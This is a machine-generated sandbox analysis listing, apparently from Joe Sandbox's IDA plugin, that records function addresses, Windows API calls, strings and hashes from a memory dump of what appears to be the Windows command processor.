                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                          • String ID: :$\
                                                                                                          • API String ID: 3961617410-1166558509
                                                                                                          • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                          • Instruction ID: 8d7a2713207fc6a61b3dd56f0b257a47f964dcf6fc4c11d195f6d3e0289f80e5
                                                                                                          • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                          • Instruction Fuzzy Hash: 6B21B722A09642C6E752AB6CF484079FAA1FF4B758FC64675D91F433B0DF3CD4498620
                                                                                                          Function 00007FF7AB127AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1397130798-0
                                                                                                          • Opcode ID: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                                                                          • Instruction ID: 86c3cc8716986ae30a45ecfe4c023472c163ea386f6927b29e602ef4bb094d46
                                                                                                          • Opcode Fuzzy Hash: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                                                                          • Instruction Fuzzy Hash: F5919A6261AB82C6EB6AAB15F4402BEF3E5FB44B48F868135D94D07774EF3CD9448720
                                                                                                          Function 00007FF7AB13258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306D6
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306F0
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB13074D
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB130762
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB1325CA
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB1325E8
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB13260F
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB132636
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB132650
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp$Heap$AllocProcess
                                                                                                          • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                          • API String ID: 3407644289-1668778490
                                                                                                          • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                          • Instruction ID: 83b5298d83ff9a82ac00fe04b9a354e98d7b85cdbf8394d14ba224b988a85f13
                                                                                                          • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                          • Instruction Fuzzy Hash: 3031A261A0A60281FB9B7F2DF850279E694BF44B48FC68030D95E462B5EE3CE448C771
                                                                                                          Function 00007FF7AB150C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                          • API String ID: 2516562204-381716982
                                                                                                          • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                          • Instruction ID: 1e49a89f63fa1b8cda2586f9bf55592d36cd6bfa91fd6d7765f206885af8926b
                                                                                                          • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                          • Instruction Fuzzy Hash: 83C1C232A0665186E755AF69E8842BEB7A0FB44B98F851235DE4E43BB4DF3CE450C710
                                                                                                          Function 00007FF7AB137E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D46E
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D485
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D4EE
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: iswspace.MSVCRT ref: 00007FF7AB12D54D
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D569
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D58C
                                                                                                          • iswspace.MSVCRT ref: 00007FF7AB137EEE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                          • String ID: A
                                                                                                          • API String ID: 3731854180-3554254475
                                                                                                          • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                          • Instruction ID: ac8c1a80ef16caf79848e0006009c95e95ea6c464e9b0e533becd4a6cadcd607
                                                                                                          • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                          • Instruction Fuzzy Hash: 45A1CD7190A682C6E662BB1AF450679F6A0FF4979CF828134CA4D477B5EF3CE4458B20
                                                                                                          Function 00007FF7AB14A39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                          • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                          • API String ID: 1580871199-2613899276
                                                                                                          • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                          • Instruction ID: abb4c0f58058baa136579dc5cd7d7a7a37b5dcb5b8bbf0bab6cc67d25481b8a4
                                                                                                          • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                          • Instruction Fuzzy Hash: BE51C871A1AB8282EB119B1DF840179B7A4FB49B88F865235DA9E47774EF3CD441CB10
                                                                                                          Function 00007FF7AB127420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                          • String ID: con
                                                                                                          • API String ID: 689241570-4257191772
                                                                                                          • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                          • Instruction ID: 28d87462e9ad78142a62602ab883f6901ece589c410e3f71709741b59ac2a56f
                                                                                                          • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                          • Instruction Fuzzy Hash: AB41E532A09645C6E611AF19F484339FAA1F749BA8F964334DA2E033F0DF3DD8498750
                                                                                                          Function 00007FF7AB14A58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                                          • String ID: PE
                                                                                                          • API String ID: 2941894976-4258593460
                                                                                                          • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                          • Instruction ID: 8b9f3fe094fe45617348b559cd825776204e89207d9c1ccc807264e6c06ebbaf
                                                                                                          • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                          • Instruction Fuzzy Hash: 5A41B76161968286E621AB19F410279FBA0FB85B94FC75230DE5D03BB4EF3CD486CB20
                                                                                                          Function 00007FF7AB130010 Relevance: 13.7, APIs: 9, Instructions: 163fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7AB14849D,?,?,?,00007FF7AB14F0C7), ref: 00007FF7AB130045
                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7AB14F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB130071
                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB130092
                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7AB1300A7
                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB130148
                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7AB130181
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 734197835-0
                                                                                                          • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                          • Instruction ID: a9a2752fe06ebb5782e966c831fcce5532c6825e107c6af54dddbb6d2e30e28d
                                                                                                          • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                          • Instruction Fuzzy Hash: 9061A131A0A692C6E66AAB19F804379FAD1FB4974CF868135C95E437B4EF3CE449C710
                                                                                                          Function 00007FF7AB149B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Enum$Openwcsrchr
                                                                                                          • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                          • API String ID: 3402383852-1459555574
                                                                                                          • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                          • Instruction ID: e65c5c9e4c1da2ac4b75b587c3de14622e1ec4023886d4c4f5cf9a39dff8d8da
                                                                                                          • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                          • Instruction Fuzzy Hash: C8A1C7A1A0A64286EE16AB5DF0502BAE2A0FF45BD8FC68531DA4D477B4FF7CD541C320
                                                                                                          Function 00007FF7AB137610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$wcscmp
                                                                                                          • String ID: %s
                                                                                                          • API String ID: 243296809-3043279178
                                                                                                          • Opcode ID: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                                                          • Instruction ID: ca657b861b7bc0b74805e6aa7edee61b9102ae056cb8df022d29336fb52eaeed
                                                                                                          • Opcode Fuzzy Hash: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                                                          • Instruction Fuzzy Hash: 39A1A62270A78696EB76EB29E8447F9A390FB4474CF914035CA4D476B5EF3CE649C310
                                                                                                          Function 00007FF7AB121F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$EnvironmentVariable
                                                                                                          • String ID: DIRCMD
                                                                                                          • API String ID: 1405722092-1465291664
                                                                                                          • Opcode ID: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                                          • Instruction ID: 35eeaf0305876599eb6f297a2141e1e31a897459cfda71eca59bc01077f4a14a
                                                                                                          • Opcode Fuzzy Hash: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                                          • Instruction Fuzzy Hash: 9B816C72A05BC1CAEB21DF28E8802EDB7A4FB49748F914139DA8D57B78DF38D1458710
                                                                                                          Function 00007FF7AB1299F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                            • Part of subcall function 00007FF7AB12CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          • wcschr.MSVCRT(?,?,?,00007FF7AB1299DD), ref: 00007FF7AB129A39
                                                                                                            • Part of subcall function 00007FF7AB12DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF7AB12CEAA), ref: 00007FF7AB12DFB8
                                                                                                            • Part of subcall function 00007FF7AB12DF60: RtlFreeHeap.NTDLL ref: 00007FF7AB12DFCC
                                                                                                            • Part of subcall function 00007FF7AB12DF60: _setjmp.MSVCRT ref: 00007FF7AB12E03E
                                                                                                          • wcschr.MSVCRT(?,?,?,00007FF7AB1299DD), ref: 00007FF7AB129AF0
                                                                                                          • wcschr.MSVCRT(?,?,?,00007FF7AB1299DD), ref: 00007FF7AB129B0F
                                                                                                            • Part of subcall function 00007FF7AB1296E8: memset.MSVCRT ref: 00007FF7AB1297B2
                                                                                                            • Part of subcall function 00007FF7AB1296E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7AB129880
                                                                                                          • _wcsupr.MSVCRT ref: 00007FF7AB13B844
                                                                                                          • wcscmp.MSVCRT ref: 00007FF7AB13B86D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                                                                                          • String ID: FOR$ IF
                                                                                                          • API String ID: 3663254013-2924197646
                                                                                                          • Opcode ID: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                          • Instruction ID: 23e0d38f4b1f284d244dcca7a574b5dc78af1de8ba646316b30151b31806270e
                                                                                                          • Opcode Fuzzy Hash: f7cff311b475cb809cbefbcbc2ea312c8d083385a1c2e3cb15cb3788630bb160
                                                                                                          • Instruction Fuzzy Hash: DC518F20B0B64285FE5ABB1DF49027AA691FF48B98BD64635D91E477F1FE3CA4058320
                                                                                                          Function 00007FF7AB12F173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F0D6
                                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F1BA
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F1E7
                                                                                                          • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F1FF
                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F2BB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
